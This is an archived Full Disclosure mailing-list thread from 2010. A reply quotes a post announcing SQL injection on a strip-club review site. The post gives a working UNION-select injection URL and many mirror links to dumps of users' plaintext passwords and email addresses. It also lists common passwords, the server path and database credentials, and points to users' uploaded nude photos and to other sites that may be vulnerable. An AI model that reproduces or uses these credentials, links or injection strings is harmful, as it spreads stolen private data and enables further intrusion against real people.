Full Disclosure mailing list archives

By Date

By Thread

Re: Tuscl.net SQL injection with 30k Plain Text Passwords & 80k Email list

Well, one thing I will point out is that the link you submitted for the actual 
SQL injection doesnt seem to work. Either they fixed it or you messed up the 
link.


________________________________
From: Ben <iluv2cane () gmail com>
To: full-disclosure () lists grok org uk
Sent: Fri, September 3, 2010 11:09:04 AM
Subject: [Full-disclosure] Tuscl.net SQL injection with 30k Plain Text Passwords 
& 80k Email list

I found many sql injections on Tuscl.net (The ultimate strip club list)

I tried notifying the site, no response. The server is ran on a vmware. So 
anything that is done to it is restored, apon reboot.

This is a dump of usernames passwords and emails for the site. They are in plain 
text. I have removed records that had the system generated password that the 
user never changed.

http://tinyurl.com/397rzqs
http://bit.ly/bkVnPY
http://is.gd/eTqna
http://jump.fm/FOJRO
http://www.mediafire.com/?l6i1vd25il61a6b
http://www.megafileupload.com/en/file/265174/users-sql-zip.html
http://www.4shared.com/file/w0qqRyDf/userssql.html
http://rapidshare.com/files/416858410/users.sql.zip
http://rapidshare.com/files/416860069/users.sql.zip
http://www.speedyshare.com/files/24097837/users.sql.zip
http://uploading.com/files/e1741mm9/users.sql.zip/
http://bit.ly/cFvd8B
http://is.gd/eTsn5


http://www.tuscl.net/c.php?CID=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17


Common Passwords and the number of accounts that shared them

password - 269
123456 - 173
tuscl - 84
stripper - 67
qwerty - 62
12345 - 49
12345678 - 47
1234 - 42
baseball - 36
monkey - 36
princess - 34
stripclub - 33
strip - 32
jennifer - 32
abc123 - 32
mustang - 31
pussy - 29
lapdance - 27
andrew - 27
jmh1978 - 27
letmein - 27
fuckyou - 27
696969 - 27
michelle - 26
harley - 25
dallas - 25
111111 - 25
shadow - 24
corvette - 24
trustno1 - 24
sunshine - 22
dragon - 21
jordan - 21
love - 21
butthead - 20
batman - 20
danielle - 20
buster - 20
password1 - 20
hello - 20
biteme - 20
gaydar - 20
Michael - 19
george - 19
hockey - 19
ginger - 19
6969 - 19
Bandit - 19
lasvegas - 18
taylor - 18
tigger - 18
yankees - 18
chicago - 18
fucker - 18
blahblah - 17
football - 17
1escobar2 - 17
1111 - 17
Jessica - 17
123456789 - 16
testing - 16
phoenix - 16
badboy - 16
gemini - 16
ranger - 16
heather - 15
gateway - 15
secret - 15
welcome - 15
654321 - 15
aaaaaa - 15
tennis - 15
asshole - 15
maggie - 14
pepper - 14
charlie - 14
golfer - 14
strippers - 14
redskins - 14
summer - 14
peanut - 14
chicken - 13
jeremy - 13
hunter - 13
m0ntlure - 13
fuckoff - 13
dancer - 13
bitch - 13
lucky - 13
whatever - 13
killer - 13
prince - 13
robert - 13
orange - 13
thomas - 13
hawaii - 12
redsox - 12
tiger - 12
titties - 12
gators - 12
Password - cnt
florida - 12
kitten - 12
austin - 12
merlin - 12
canada - 12
diamond - 12
boston - 12
master - 12
yellow - 12
falcon - 12
jasmine - 12
1234567 - 12
cookie - 12
superman - 12
midnight - 12
blowme - 12
jackass - 12
sparky - 12
peekaboo - 11
doctor - 11
brandy - 11
8675309 - 11
madison - 11
braves - 11
brooklyn - 11
money - 11
anthony - 11
samantha - 11
ashley - 11
lucky1 - 11
amanda - 11
booboo - 11
SOCCER - 11
tarheels - 11
bigdog - 11
pookie - 11
private - 11
tiffany - 11
martin - 11
silver - 11
lakers - 10
eatme - 10
junior - 10
platinum - 10
sex - 10
iloveyou - 10
nicole - 10
vegas - 10
wolfpack - 10
55555555 - 10
barney - 10
melissa - 10
molly - 10
passw0rd - 10
sexy - 10
nascar - 10
dietcoke - 10
chris - 10
boomer - 10
test123 - 10
johnny - 10
red123 - 10
asdfgh - 10
ncc1701 - 10
314159 - 10
internet - 10
jackson - 10
computer - 10
peaches - 10
horny - 10
sierra - 10
rush2112 - 10

Here is the complete list of email addresses registered. The site had no 
validated so, I am sure, some are fake.
http://www.tuscl.net/emails.zip
http://rapidshare.com/files/416871314/emails.zip
http://www.mediafire.com/?67rzfbvmyr1c492
http://www.speedyshare.com/files/24098846/emails.zip
http://www.megafileupload.com/en/file/265210/emails-zip.html

The path to the working directory is: /home/httpd/vhosts/tuscl.net/httpdocs/

The SQL information is
"localhost" - "tuscl" - "szg4wpl9"

Also if you want to look at all the nudey photos uploaded here is where they are
http://www.tuscl.net/pictures/

There are other sites that could have been comprimised as well:
vanjonesthinksimanasshole.com
tuscl.com
onerun.com
ecampguide.com (contains another 1200 plain text passwords)
troopedge.com

Well have fun!
Owner or media if you want get ahold of me:
auto595158 () hushmail com



      

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

By Date

By Thread

Current thread:

• Tuscl.net SQL injection with 30k Plain Text Passwords & 80k Email list Ben (Sep 03)
  • Re: Tuscl.net SQL injection with 30k Plain Text Passwords & 80k Email list Jhfjjf Hfdsjj (Sep 04)
    • Message not available
      • Re: Tuscl.net SQL injection with 30k Plain Text Passwords & 80k Email list Ben (Sep 04)
      • Re: Tuscl.net SQL injection with 30k Plain Text Passwords & 80k Email list Ben (Sep 08)
      • Re: Tuscl.net SQL injection with 30k Plain Text Passwords & 80k Email list Benji (Sep 08)